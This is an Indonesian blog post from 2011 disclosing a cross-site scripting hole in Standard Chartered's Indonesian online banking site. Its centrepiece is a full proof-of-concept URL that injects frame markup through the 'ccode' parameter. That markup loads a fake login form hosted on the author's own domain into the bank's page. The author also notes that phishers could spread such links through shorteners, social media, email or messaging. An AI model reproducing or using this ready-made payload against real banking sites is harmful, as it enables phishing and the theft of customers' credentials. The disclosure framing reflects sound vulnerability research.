Menanam Form Login Palsu Pada Web Standard Chartered Online Banking


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Tuesday, October 4th, 2011
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Lagi-lagi Bank Standard Chartered memiliki celah XSS yang cukup serius. Celah ini memungkinkan phisher untuk membuat form login palsu pada area Online Banking. Sama dengan celah-celah XSS pada umumnya, tidak ada kerusakan yang akan ditimbulkan pada sisi Standard Chartered. Hanya saja, apabila celah ini dibiarkan, tinggal menunggu waktu ada orang jahat yang memanfaatkan celah ini untuk melakukan aksi penipuan dengan berbekal penyingkat URL, jejaring sosial, email, atau instant messenger.

Contoh Hasil Form Login Palsu

{image: Standard Chatered Online Banking XSSED by SPYRO KiD}

Standard Chatered Online Banking XSSED by SPYRO KiD

POC

https://id.online.standardchartered.com/Init/IBank?ser=100&act=MainFrame_ID.jsp&ccode=ID.jsp%22%20name=%22logoFrame%22%20scrolling=%22no%22%20noresize=%22noresize%22%20id=%22logoFrame%22%20title=%22Logo%20Frame%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22%3E%3Cframe%20src=%27/scb/newGUI/blank.html%27%20NAME=loginDateFrame%20scrolling=%22no%22%20noresize=%22noresize%22%20id=%22loginDateFrame%22%20title=%22Date%20Frame%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22%3E%3Cframe%20src=%27http://www.spyrozone.net/playground/StandardChartered/CenterContent.html%27%20NAME=%22CenterContent%22%20scrolling=%22no%22%20noresize=%22noresize%22%20style=%22overflow-x:hidden;%22%20id=%22CenterContent%22%20title=%22Date%20Frame%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22%20%3E%3Cnoscript%3E


//E.O.F